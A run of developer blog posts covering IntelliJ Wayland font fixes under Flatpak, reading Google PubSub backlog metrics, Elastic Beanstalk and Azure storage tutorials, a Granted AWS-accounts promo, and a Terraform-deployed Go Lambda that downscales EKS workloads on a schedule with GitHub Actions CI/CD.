icon](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wq4tt832hwz30lpoqp5g.png) Follow the same installation steps through the store, searching for [Flatseal](https://flathub.org/pt-BR/apps/com.github.tchx84.Flatseal), or run the command below in the terminal. ```sh flatpak install flathub com.github.tchx84.Flatseal ``` ## Configuring IntelliJ The following steps can also be applied to [Android Studio](https://flathub.org/pt-BR/apps/com.google.AndroidStudio) installed via Flatpak. - Open <code>Flatseal</code> and look for IntelliJ IDEA ![Flatseal](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/83uproo2ws01ufdjkv4k.png) Scroll down the page and find the <code>Environment</code> section - Set JAVA_HOME. ```sh JAVA_HOME=~/Programs/IntelliJ/jbr_jcef-21.0.3-linux-x64-b509.4/bin ``` ![Flatseal Environment section](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5spu6h0ehsxrvr18xpon.png) Note that the Wayland socket must be enabled ![Flatseal sockets section](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xyywifg225enzy5d7bjn.png) - Configuring the VM options. Open IntelliJ and press the <code>CTRL + SHIFT + A</code> shortcut. In Actions, search for <code>VM Options</code>.
Clique em <code>Edit Custom Options</code> ![Popup de comandos](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5x6v5b34718g9cg9zk2p.png) No arquivo idea64.vmoptions adicione a seguinte configuração ```init -Dawt.toolkit.name=WLToolkit ``` Como no exemplo abaixo. ![Configuração da VMOptions em arquivo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/108jp8hyu5svy45p708j.png) Feche e abra o IntelliJ, então verifique se há problemas com as fontes borradas. ## Problemas? Caso não houve alterações, então o passo seguinte será alterar o Runtime da IDE. Com o atalho <code>CTRL + SHIFT + A</code> procure por <code>Choose Boot Java Runtime for the IDE</code> ![Choose Boot Java Runtime for the IDE](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gnzp212dbprvashy01v0.png) Com a opção de _Runtimes_ aberto, procure pelo campo de selação <code>New</code> e selecione a opção <code>Add Custom Runtime</code> e <code>Add JDK</code>, então adicione a JDK 21 obtida nos passos iniciais desse tutorial. 1. ![Exemplo de configuração de runtime da JDK](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6nvw6ct6j0e82dy8qko5.png) 2. ![JDK 21](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/iyy8uuzwwewgqfuzz4sl.png) Clique em <code>OK</code> e reinicie a IDE ## Dicas Como fiquei na dúvida se houve mesmo uma alteração (Minha visão não está tão boa no momento) tenho dois IntelliJ no PC, um via Flatpak e outro em tar.gz, então coloquei ambos lado a lado se fiz minhas comparações. ## Nota - Caso queira fazer o tutorial para IntelliJ ou Android Studio instalados de outra forma, recomendo pesquisar como reproduzir os passos em um contexto fora do flatpak. - Para mais informações consulte a issue no github sobre os testes do IntelliJ no Wayland em https://github.com/JetBrains/JetBrainsRuntime/issues/242
danroxha
1,910,966
Google PubSub: Number of Unread Messages
This week, I explored different techniques for handling long-running tasks, such as calls to Language...
0
2024-07-04T22:50:41
https://dev.to/shannonlal/google-pubsub-number-of-unread-messages-57jh
pubsub, googlecloud, typescript
This week, I explored different techniques for handling long-running tasks, such as calls to Large Language Models (LLMs), and decided to introduce a queue to better manage our requests. To achieve this, I deployed a Google PubSub Topic, which helps in efficiently managing and processing our requests. However, we also wanted to provide our users with an estimate of how long it would take before their task is completed. To accomplish this, I needed to determine the approximate number of unread messages in the topic.

After examining the Google PubSub API, I discovered that it doesn't provide direct access to the number of unread messages. However, I found an alternative solution using Google Metric Explorer. By leveraging the metrics available through this tool, I was able to retrieve the necessary data to estimate the number of unread messages in the PubSub topic. In the following section, I will share some TypeScript code that demonstrates how this works.

The first thing you need to do is install the Google packages

```
npm install @google-cloud/monitoring @google-cloud/pubsub
```

The key metric you are looking for is the number of undelivered messages. Google Metric Explorer has a UI that you can use to build and run queries against different parts of your infrastructure. The following is an MQL query that I used against one of my subscriptions to get the unread messages

```
fetch pubsub_subscription
| metric 'pubsub.googleapis.com/subscription/num_undelivered_messages'
| filter (resource.resource.subscription_id == '${subscriptionName}')
| group_by 1m, [value_num_undelivered_messages_mean: mean(value.num_undelivered_messages)]
| every 1m
| group_by [], [value_num_undelivered_messages_mean_aggregate: aggregate(value_num_undelivered_messages_mean)]
```

The following is the code you can use to run the above query and get the number of unread messages for your topic

```
import monitoring from '@google-cloud/monitoring';

async getUnackedMessages(topicId: string, projectId: string, region: string): Promise<number> {
  const monitoringClient = new monitoring.QueryServiceClient();
  try {
    const queryRequest = {
      name: `projects/${projectId}`,
      query: 'QUERY FROM ABOVE',
    };

    const [response] = await monitoringClient.queryTimeSeries(queryRequest);

    // Guard against empty results before reading the first data point
    if (response.length > 0 && response[0].pointData && response[0].pointData.length > 0) {
      return Number(response[0].pointData[0].values[0].doubleValue);
    } else {
      return 0; // Default condition
    }
  } catch (error) {
    console.error('Error fetching unacked messages:', error);
    throw error;
  }
}
```

The above code works well; however, there are a couple of things you need to keep in mind. Firstly, this is not a real-time API, so if you are adding messages to your topics, the changes will not be immediately reflected. I believe this has to do with how PubSub pushes messages to its subscribers. Lastly, I occasionally noticed that when calling this API, I would get an empty array back instead of the expected responses.

If you have any comments, questions, or insights regarding this approach, please feel free to reach out to me. I'm always eager to learn from the community and discuss ways to improve and optimize our solutions.
shannonlal
1,912,031
Deploying a Node.js Application on AWS Elastic Beanstalk
Deploying applications to AWS Elastic Beanstalk is straightforward and ideal for quickly deploying...
0
2024-07-04T22:41:48
https://dev.to/fabiola_estefanipomamac/deploying-a-nodejs-application-on-aws-elastic-beastalk-2nld
Deploying applications to AWS Elastic Beanstalk is straightforward and ideal for quickly deploying Node.js applications without managing infrastructure. We'll deploy a basic Node.js application using Express.js to AWS Elastic Beanstalk.

Example Application

**Setup Your Project**

```
mkdir nodejs-app
cd nodejs-app
npm init -y
```

**Install Dependencies**

```
npm install express
```

**Create the Application (app.js)**

```
const express = require('express');
const app = express();

app.get('/', (req, res) => {
  res.send('Welcome to AWS Elastic Beanstalk Deployment!');
});

const port = process.env.PORT || 3000;
app.listen(port, () => {
  console.log(`Server running on port ${port}`);
});
```

**Create the .ebextensions Directory**

Create a `.ebextensions` directory in the project root and add a configuration file (for example, `.ebextensions/nodecommand.config`) with the following content:

```
option_settings:
  aws:elasticbeanstalk:container:nodejs:
    NodeCommand: "app.js"
```

**Deploy to AWS Elastic Beanstalk**

1. Sign in to the AWS Management Console and navigate to Elastic Beanstalk.
2. Create a new application and environment, selecting the Node.js platform.
3. Upload your application code (including app.js, package.json, and node_modules if necessary).
4. Deploy your application.

**Access Your Application**

Once deployed, Elastic Beanstalk will provide you with a URL to access your application (http://app-name.elasticbeanstalk.com).
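If you prefer the command line over the console upload, the Elastic Beanstalk CLI can package and deploy straight from the project directory. This is only a rough sketch; the application and environment names below are placeholders, not values from this article.

```sh
# Install the EB CLI (one time)
pip install awsebcli

# Initialize the EB application with a Node.js platform and create an environment
eb init my-nodejs-app --platform node.js --region us-east-1
eb create nodejs-app-env

# Push subsequent code changes
eb deploy

# Open the environment URL in a browser
eb open
```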
fabiola_estefanipomamac
1,912,030
The Importance of Using Granted for Managing Multiple AWS Accounts
Introduction Managing multiple AWS accounts can be overwhelming. Switching between...
0
2024-07-04T22:35:35
https://dev.to/fernandomullerjr/the-importance-of-using-granted-for-managing-multiple-aws-accounts-203c
aws, cloud, devops, sre
## Introduction Managing multiple AWS accounts can be overwhelming. Switching between accounts, remembering credentials, and handling permissions are just a few challenges. Enter Granted—a tool designed to streamline and secure your AWS account management. This post delves into how Granted can transform your AWS experience, enhancing productivity and security. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t20vrlcuat7svxozwc0i.png) ## The Challenges of Managing Multiple AWS Accounts Handling multiple AWS accounts involves juggling different credentials, switching between various consoles, and managing permissions effectively. This complexity can lead to security risks and inefficiencies, making the need for a streamlined solution crucial. ## What is Granted? Granted is a tool that simplifies the process of managing multiple AWS accounts. It allows users to access all their AWS accounts with a single command, manage permissions seamlessly, and enhance security with multifactor authentication and encryption. Detailed article explaining installation and usage: [https://devopsmind.com.br/en/cloud-en-us/aws-cli-multiple-accounts/](https://devopsmind.com.br/en/cloud-en-us/aws-cli-multiple-accounts/) ## Benefits of Using Granted ### Easy Access Granted enables quick and easy access to all your AWS accounts using a single command. No more juggling multiple credentials or constantly switching between consoles. ### Simplified Permission Management With Granted, you can define and control permissions across all your AWS accounts from one central place. This granular control ensures that only authorized users have access to specific resources, enhancing overall security. ### Enhanced Security Granted employs multifactor authentication and encryption to protect your AWS accounts from unauthorized access. This added layer of security ensures that your accounts remain safe and secure. ### Increased Productivity By automating account management tasks such as switching between accounts and handling permissions, Granted boosts productivity. Users can focus more on their core tasks rather than administrative overhead. ## How to Use Granted Suppose you have three AWS accounts: development, testing, and production. With Granted, you can easily: Access any account with a single command. Set different permissions for each account. Automate the switching process, saving time and effort. ## Conclusion Granted is an essential tool for anyone managing multiple AWS accounts. It simplifies access, enhances security, and boosts productivity. By integrating Granted into your workflow, you can manage your AWS environments more efficiently and securely. ## FAQs 1. What is Granted? Granted is a tool that simplifies managing multiple AWS accounts by providing easy access, simplified permissions, and enhanced security. 2. How does Granted improve security? Granted uses multifactor authentication and encryption to protect AWS accounts from unauthorized access. 3. Can Granted improve productivity? Yes, by automating tasks like switching between accounts and managing permissions, Granted significantly boosts productivity. 4. Is Granted easy to use? Absolutely, Granted allows users to access all their AWS accounts with a single command, making it user-friendly. 5. Where can I learn more about Granted? For more information, visit the [Granted website](https://www.granted.dev/). 
Or check this detailed article: [https://devopsmind.com.br/en/cloud-en-us/aws-cli-multiple-accounts/](https://devopsmind.com.br/en/cloud-en-us/aws-cli-multiple-accounts/)
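To make the "single command" workflow described above a little more concrete, here is a hedged sketch of typical day-to-day usage with Granted's `assume` command. The profile names are placeholders, and exact flags may vary between versions, so treat this as illustrative rather than authoritative.

```sh
# Assume credentials for one of your configured AWS profiles in the current shell
assume dev-account

# Open the AWS console for another account in the browser instead
assume -c prod-account
```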
fernandomullerjr
1,911,791
One tool to rule them all - Terraform: EKS Golang Client & E2E AWS Lambda CI/CD via IaC
Table of Contents Introduction Prerequisites Lambda RBAC permissions Farewell ...
0
2024-07-04T22:33:59
https://dev.to/wardove/from-code-to-cloud-with-terraform-eks-golang-client-e2e-aws-lambda-cicd-with-iac-2id8
aws, terraform, go, devops
## Table of Contents <a name="Toc"></a> 1. [Introduction](#introduction) 2. [Prerequisites](#prerequisites ) 3. [Lambda RBAC permissions](#rbac) 4. [Farewell](#farewell) ![Architecture-Flow](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dzoty4yi6pimjb8lxxaw.gif) ## Introduction <a name="introduction"></a> Hey Folks! In this article, we delve into the seamless integration of Terraform for deploying compiled Lambda functions. During the process I will showcase how AWS Lambda can be effectively used as a Kubernetes client. And as final layer of our sandwich - E2E Terraform CI/CD with GitHub Actions to facilitate continuous infrastructure provisioning and software delivery all in one! So, here is some backstory. Previously, I wondered how to facilitate a more reactive and event driven interaction with my EKS cluster in a cloud-native environment. And naturally when I think of event-driven approach in AWS context - lambdas and EventBridge are one of the first things that come to mind, and for a good reason 😁 right? Combination of these 2 can provide endless number of solutions for various problems - where an action is needed based on some event or some specific schedule. We will be looking at one of them, particularly - "How to scale down EKS workloads on a scheduled basis". ![serverless-deploy](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/h6u7vkuzjxaxps22hqmu.png) We will be using my humble EKS-downscaler app. As a client, it provides similar functionality to an [operator with the same name](https://codeberg.org/hjacobs/kube-downscaler). This app is conceptual and serves as an example of how AWS Lambdas can interact with Kubernetes. With our solution, we will specify namespaces and cron expressions, and Terraform coupled with downscaler lambda will handle everything. This article will showcase Terraform from a perfect angle - as it will be our main tool to manage continuous configuration changes, provision and manage cloud resources, and deliver seamless code-to-Lambda deployment. This approach can be used as a standalone terraform project or integrated into more complex IaC projects by passing inputs directly (e.g., "var.cluster_name" that is required as input could have been passed via remote state or directly from root/child module where we create the eks cluster). ## Prerequisites <a name="prerequisites"></a> As you might have guessed, we have some prerequisites: - Terraform - AWS CLI - Go runtime - EKS cluster You can provision and [create and manage your EKS cluster](https://docs.aws.amazon.com/eks/latest/userguide/create-cluster.html) in any way you prefer. It might be App of Apps, eksctl, or manual provisioning, as it is very individual. However, I will be showcasing example kubernetes resources with Terraform code examples. So, as mentioned earlier - with our EKS cluster managed via Terraform, this project can be a part of it as a separate module or a standalone project decoupled from main code basis. In this article, it will be separate. ## Lambda RBAC permissions <a name="rbac"></a> To enable our Lambda function to interact with the EKS cluster, we need to grant it specific permissions using Role-Based Access Control (RBAC). This involves defining a Kubernetes group, by creating a cluster role, and establishing a cluster role binding. I am creating those using my main EKS Terraform project. 
You can go ahead and do the same manually 🙃 Further, We can associate this group with our Lambda role by [creating an access entry](https://docs.aws.amazon.com/eks/latest/userguide/access-entries.html) in the separate project where we will provision the Lambda itself or right in the main eks project or once again go and do it manually via console. For now let's just create RBAC components: ```hcl resource "kubernetes_cluster_role" "lambda" { metadata { name = "lambda-clusterrole" } rule { api_groups = ["*"] resources = ["deployments", "deployments/scale", "statefulsets", "daemonsets", "jobs"] verbs = ["get", "list", "watch", "create", "update", "patch", "delete"] } } resource "kubernetes_cluster_role_binding" "lambda" { metadata { name = "lambda-clusterrolebinding" } role_ref { api_group = "rbac.authorization.k8s.io" kind = "ClusterRole" name = kubernetes_cluster_role.lambda.metadata[0].name } subject { kind = "Group" name = "lambda-group" api_group = "rbac.authorization.k8s.io" } } ``` EKS Lambda Client Now, let's dive into the heart of our project: the EKS Lambda Client. You'll find all the relevant code to deploy our Lambda function using Terraform in [this GitHub repo](https://github.com/WarDove/eks-downscaler). ``` eks-downscaler ├── .github │ └── workflows │ └── terraform.yml ├── lambdas │ └── downscaler │ ├── go.mod │ └── main.go │ ├── modules │ └── downscaler │ ├── iam.tf │ ├── lambda.tf │ ├── locals.tf │ ├── scheduler.tf │ └── variables.tf ├── backend.sh ├── backend.tf ├── main.tf ├── readme.md ├── terraform.tfvars └── variables.tf ``` Our repository contains both the Golang Lambda code and the Terraform scripts that manage its deployment. We'll be exploring each component step-by-step, starting with the Terraform S3 backend bootstrapper script. As always this is where the magic begins, setting up the backend for our infrastructure. > backend.sh ```bash #!/bin/bash set -euo pipefail PROJECT_NAME=$(basename "$(dirname \"${PWD}\")") AWS_REGION=${AWS_REGION:-us-east-2} AWS_PROFILE=${AWS_PROFILE:-default} AWS_ACCOUNT_ID="$(aws sts get-caller-identity --query Account --output text --profile ${AWS_PROFILE})" export AWS_PAGER="" echo -e "Bootstraping terraform backend...\n" echo PROJECT_NAME: "${PROJECT_NAME}" echo AWS_REGION: "${AWS_REGION}" echo AWS_PROFILE: "${AWS_PROFILE}" echo AWS_ACCOUNT_ID: "${AWS_ACCOUNT_ID}" echo BUCKET NAME: "terraform-tfstate-${PROJECT_NAME}" echo DYNAMODB TABLE NAME: terraform-locks echo -e "\n" aws s3api create-bucket \ --region "${AWS_REGION}" \ --create-bucket-configuration LocationConstraint="${AWS_REGION}" \ --bucket "terraform-tfstate-${PROJECT_NAME}" \ --profile "${AWS_PROFILE}" aws dynamodb create-table \ --region "${AWS_REGION}" \ --table-name terraform-locks \ --attribute-definitions AttributeName=LockID,AttributeType=S \ --key-schema AttributeName=LockID,KeyType=HASH \ --provisioned-throughput ReadCapacityUnits=1,WriteCapacityUnits=1 \ --profile "${AWS_PROFILE}" cat <<EOF > ./backend.tf terraform { required_providers { aws = { source = "hashicorp/aws" version = "~> 5.57" } } required_version = ">=1.9.0" backend "s3" { bucket = "terraform-tfstate-${PROJECT_NAME}" key = "${PROJECT_NAME}" region = "${AWS_REGION}" dynamodb_table = "terraform-locks" } } provider "aws" {} EOF echo -e "\nBackend configuration created successfully!\n" cat ./backend.tf ``` This script bootstraps a Terraform backend for managing state files. It captures the project name, AWS region, profile, and account ID. 
Then, it creates an S3 bucket and a DynamoDB table for state file storage and locking, respectively. Finally, it generates a backend.tf configuration file, linking Terraform to the newly created S3 bucket and DynamoDB table, ensuring secure and organized state management. So to initialize first you will need to define your Access credentials either by using AWS_PROFILE or AWS_SECRET_ACCESS_KEY & AWS_ACCESS_KEY_ID. ## Main Configuration File > It would be redundant to go over every file in our repo, as the hcl + go code is defined in idiomatic way, and all the nitty-gritty part should be clear already (iam role and policies for lambda to describe our cluster, EventBridge scheduler resource and its permissions.. all the extras and bla bla bla..) Our main.tf is the main spot where we define all the configuration for our client. This file references the downscaler module, specifying the EKS cluster name, Lambda source path, scaling schedules, and namespaces to manage. It's like the conductor of an orchestra, ensuring every component works in perfect harmony. ```hcl module "downscaler_lambda_client" { source = "./modules/downscaler" eks_cluster_name = var.cluster_name ci_env = var.ci_env lambda_source = "${path.root}/lambdas/downscaler" scale_out_schedule = "cron(00 09 ? * MON-FRI *)" scale_in_schedule = "cron(00 18 ? * MON-FRI *)" eks_groups = ["lambda-group"] namespaces = ["development", "test"] } ``` ## Lambda Deployment Process Now, let's talk about how we build, zip, and deploy our Lambda function in `modules/downscaler/lambda.tf`. ```hcl resource "null_resource" "lambda_build" { provisioner "local-exec" { working_dir = var.lambda_source command = "go mod tidy && GOARCH=amd64 GOOS=linux go build -o bootstrap main.go" } triggers = { ci_env = var.ci_env file_hash = md5(file("${var.lambda_source}/main.go")) } } data "archive_file" "lambda_zip" { depends_on = [null_resource.lambda_build] type = "zip" source_file = "${var.lambda_source}/bootstrap" output_path = "${var.lambda_source}/main.zip" } resource "aws_lambda_function" "downscaler_lambda" { filename = data.archive_file.lambda_zip.output_path source_code_hash = data.archive_file.lambda_zip.output_base64sha256 function_name = var.project_name handler = "main" runtime = "provided.al2023" role = aws_iam_role.lambda_role.arn environment { variables = { CLUSTER_NAME = var.eks_cluster_name } } } resource "aws_eks_access_entry" "lambda" { cluster_name = var.eks_cluster_name principal_arn = aws_iam_role.lambda_role.arn kubernetes_groups = var.eks_groups type = "STANDARD" } ``` - Building the Lambda: We begin by checking for changes in our main.go file. Using a hash function, we detect any modifications and trigger a rebuild of the Lambda function. This ensures our deployment is always up-to-date with the latest code changes. - We also have a cheeky `ci_env = var.ci_env` trigger here, which identifies if we are running the project locally or from CI. Motive is to rebuild our application every time if we are applying in Github Actions CI Context. - Zipping the Lambda: After building the Lambda, we zip the compiled executable. This zipped file becomes the core package for our Lambda function, ready for deployment. - Deploying the Lambda: With Terraform, we deploy the Lambda function using the zipped file. Terraform handles all the heavy lifting, ensuring the Lambda is correctly set up and configured to interact with our EKS cluster. 
- Assigning Permissions: We also need to attach the necessary permissions (previously created RBAC resources) to local Lambda role by using [Access Entries](https://docs.aws.amazon.com/eks/latest/userguide/access-entries.html#creating-access-entries). - All AWS sided permissions -> iam resources - roles, necessary policies are defined in [iam.tf](https://github.com/WarDove/eks-downscaler/edit/main/modules/downscaler/iam.tf) file ![access-entries](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/un0oe1ti8d9lxwxh0a3j.png) This elegant process, managed by Terraform, ensures that our Lambda function is built, zipped, and deployed seamlessly. ## Lambda client code ```go package main import ( "context" "encoding/json" "github.com/aws/aws-lambda-go/lambda" eksauth "github.com/chankh/eksutil/pkg/auth" log "github.com/sirupsen/logrus" autoscalingv1 "k8s.io/api/autoscaling/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/client-go/kubernetes" "os" ) type Payload struct { ClusterName string `json:"clusterName"` Namespaces []string `json:"namespaces"` Replicas int32 `json:"replicas"` } func main() { if os.Getenv("ENV") == "DEBUG" { log.SetLevel(log.DebugLevel) } lambda.Start(handler) } func handler(ctx context.Context, payload Payload) (string, error) { cfg := &eksauth.ClusterConfig{ ClusterName: payload.ClusterName, } clientset, err := eksauth.NewAuthClient(cfg) if err != nil { log.WithError(err).Error("Failed to create EKS client") return "", err } scaled := make(map[string]int32) for _, ns := range payload.Namespaces { deployments, err := clientset.AppsV1().Deployments(ns).List(ctx, metav1.ListOptions{}) if err != nil { log.WithError(err).Errorf("Failed to list deployments in namespace %s", ns) continue } for _, deploy := range deployments.Items { if err := scaleDeploy(clientset, ctx, ns, deploy.Name, payload.Replicas); err == nil { scaled[ns+"/"+deploy.Name] = payload.Replicas } } } scaledJSON, err := json.Marshal(scaled) if err != nil { log.WithError(err).Error("Failed to marshal scaled deployments to JSON") return "", err } log.Info("Scaled Deployments: ", string(scaledJSON)) return "Scaled Deployments: " + string(scaledJSON), nil } func scaleDeploy(client *kubernetes.Clientset, ctx context.Context, namespace, name string, replicas int32) error { scale := &autoscalingv1.Scale{ ObjectMeta: metav1.ObjectMeta{ Name: name, Namespace: namespace, }, Spec: autoscalingv1.ScaleSpec{ Replicas: replicas, }, } _, err := client.AppsV1().Deployments(namespace).UpdateScale(ctx, name, scale, metav1.UpdateOptions{}) if err != nil { log.WithError(err).Errorf("Failed to scale deployment %s in namespace %s", name, namespace) } else { log.Infof("Successfully scaled deployment %s in namespace %s to %d replicas", name, namespace, replicas) } return err } ``` Our Lambda client code adds the last piece of logic behind scaling operations in the EKS cluster. It starts by defining a Payload structure, which includes the cluster name, namespaces, and desired replicas. The main function sets up the Lambda handler, which initiates the scaling process. And obviously we are picking the name of the cluster as an environment variable - which is originally propagated via terraform resource. The handler creates an EKS client, lists deployments in the specified namespaces, and scales each deployment to the desired number of replicas. The scaled deployments are then logged and returned as a JSON response. 
This ensures our deployments are dynamically scaled based on the defined schedules, providing efficient resource management. Naturally, all logs flow directly to CloudWatch Logs, where we can observe all the details regarding invocations and it's output. ## Terraform CI/CD It's continuous delivery and continuous provisioning time! 🚀🚀🚀 Our CI/CD workflow is defined in the `terraform.yml` file within the `.github/workflows` directory. This workflow ensures that our Terraform configurations are automatically applied whenever changes are pushed to the main branch. ```yaml name: Terraform CI/CD run-name: "Terraform CI/CD | triggered by @${{ github.actor }}" on: push: branches: - 'main' jobs: terraform-apply: runs-on: ubuntu-latest env: TF_VAR_cluster_name: ${{ secrets.CLUSTER_NAME }} TF_VAR_ci_env: true AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} AWS_REGION: us-east-2 steps: - uses: actions/checkout@v4 - uses: hashicorp/setup-terraform@v3 with: terraform_version: 1.9.0 - name: Terraform Init run: terraform init - name: Terraform Validate run: terraform validate - name: Terraform Apply run: terraform apply -auto-approve ``` The CI/CD pipeline kicks off by checking out the code from the repository and setting up Terraform. It then initializes Terraform, validates the configuration, and applies the changes to deploy our infrastructure. > It is always better to have extra linting/testing/scanning in terraform CI, another topic for another day maybe😉 ![Terraform apply Successfull!](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/34fzwfavzsk1mvv9kyum.png) ### Secrets and Environment Variables Key secrets and environment variables are passed into the workflow to ensure secure and proper configuration. We use the `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY` for authenticating with AWS, and `CLUSTER_NAME` to specify the EKS cluster name. These secrets are securely stored in GitHub's repository settings. ![Adding GHA Secrets](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/69g5p57e5xod4puj7bt8.png) As you may already know `TF_VAR_` prefix, is handy to override/define values via environment variables - especially in CI environment. This ensures that even if variables are defined elsewhere or gitignored (in our case tfvars files are gitignored), our CI/CD pipeline uses the CI values. For example, `TF_VAR_ci_env` is set to `true` in the CI environment, enforcing rebuilds (via local-provisioner trigger) and ensuring changes are accurately reflected in the deployment. ## Farewell 😊 <a name="farewell"></a> ![goodbye](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qvju7igtuysnmhng7ubt.gif) In this article, we’ve explored a comprehensive method for deploying and managing AWS resources using Terraform, AWS Lambda, and EventBridge. We delved into the seamless integration of Terraform for deploying compiled Lambda functions, showcased how AWS Lambda can effectively interact with EKS, and implemented full-scale automation with GitHub Actions. These three pearls highlight the power of Terraform in creating a cohesive and dynamic deployment strategy. Thank you for following along. I hope this guide has provided you with valuable insights and can serve as a reference for your future projects. Keep exploring, keep learning, and continue refining your cloud practices! 
![Sauron](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sode6jxhfy1uk7bz1d0i.gif) > "One tool to rule them all, one tool to deploy them, One tool to automate 'em, and with terraform apply them; in the cloud where serverless hides"
wardove
1,910,925
Creating Shared File Storage in Microsoft Azure
In this guide, we will walk through the steps to create a shared storage account in Microsoft Azure....
0
2024-07-04T22:26:46
https://dev.to/jimiog/creating-shared-file-storage-in-microsoft-azure-4a1g
azure, microsoft, cloud, cloudstorage
In this guide, we will walk through the steps to create a shared storage account in Microsoft Azure. We'll cover creating a storage account, setting up a file share, managing snapshots, and restricting access to selected virtual networks. ## Creating a Storage Account 1. **Create a Storage Account:** - Create a Resource Group for your storage and assign it a name. - Choose Performance as Premium and set the account type to File Shares. - Set Redundancy to Zone-Redundant storage. - Create the resource and navigate to it. ![Configuring Storage Account](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/buinfsv9j1tnmoqb0lwb.jpg) 2. **Setting up File Shares:** - In the Data Storage section, select File Shares. ![Locating File Shares](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xop03yogwg2feifb8b5i.jpg) - Click on +File Share and create a name for the file share. ![Adding a File Share](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/47lpklftt2isink2icid.jpg) - Leave other settings as default and click Review+Create, then click Create. ![Creating the File Share](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0mucfq6f8gmxjvvuv41i.jpg) 3. **Adding a Directory:** - Click on +Add Directory and give your directory a name. ![Adding a directory](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7tzhfhwt6c2qgvp8hm5h.jpg) - Navigate to your newly created directory and upload a file of your choice. ![Navigating to new Directory](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b9cmeo18lsz8kpworq6y.jpg) ![Uploading file](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aiq18xfmohj8g01jk0ss.jpg) 4. **Configuring and Testing Snapshots:** - Go back to your File Share, select Operations, and click Snapshots. ![Locating snapshot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wlupnjygq4i8m9hf5fjs.jpg) - Click +Add Snapshot, optionally add a comment, and confirm. ![Adding snapshot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/plpteucg23osee9se8xw.jpg) - Ensure your directory is included in the snapshot. ![Looking at directory](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/61gz4xxbgkirwcyyx0bi.jpg) - Test the snapshot functionality by deleting the uploaded file, then restore it from the snapshot. 5. **Restricting Storage Access to Virtual Networks:** - Create a Virtual Network: - Search for "Virtual Network" and create a new one with default settings. ![Locating Virtual Network](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ft3c4aw5hys9gv93dta5.jpg) ![Configuring a Virtual Network](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aog7sh7dna6eznvaksf7.jpg) - Navigate to the subnet settings, select the default subnet, and enable "Microsoft.Storage" under Service Endpoints. ![Locating Subnets](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/12vfhs8dyhhzfv45st0s.jpg) ![Clicking the default subnet](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tcgbm0bnw1wljawmb8bg.jpg) ![Choosing the service endpoint](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j1t8zh32nwjpogkhm2it.jpg) 6. **Configure Network Access for the Storage Account:** - Return to your File Storage account. - In the Security+Networking section, click on Networking. ![Find networking](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q3ihx5cad3zngmzi2s82.jpg) - Enable access from selected virtual networks and IP addresses. - Add the virtual network you created earlier and select the default subnet. 
- Save the settings. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4c8w3qppv75zmr1xiivw.jpg) 7. **Verification:** - Navigate back to your File Share and ensure access is restricted to the specified virtual network. ![Restricted Access](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sxfmclt97vbb8689bx9f.jpg) ## Cleanup Remember to delete all resources created during this process to avoid unnecessary charges. By following these steps, you have successfully created a File Share, configured snapshots for your files, and restricted access to a virtual network.
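If you prefer scripting these steps, the Azure CLI has rough equivalents to the portal workflow above. The following is only a sketch; resource names are placeholders and options may need adjusting for your subscription and region.

```sh
# Premium, zone-redundant storage account intended for file shares (placeholder names)
az storage account create \
  --name mysharedfilesacct \
  --resource-group my-resource-group \
  --location eastus \
  --kind FileStorage \
  --sku Premium_ZRS

# Create the file share in that account
az storage share-rm create \
  --storage-account mysharedfilesacct \
  --name myfileshare
```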
jimiog
1,910,836
Creating Private Storage in Microsoft Azure
We'll be going over creating a storage account and adding files for private access. Feel free to look...
0
2024-07-04T22:26:22
https://dev.to/jimiog/creating-private-storage-in-microsoft-azure-5803
azure, cloud, cloudstorage, microsoft
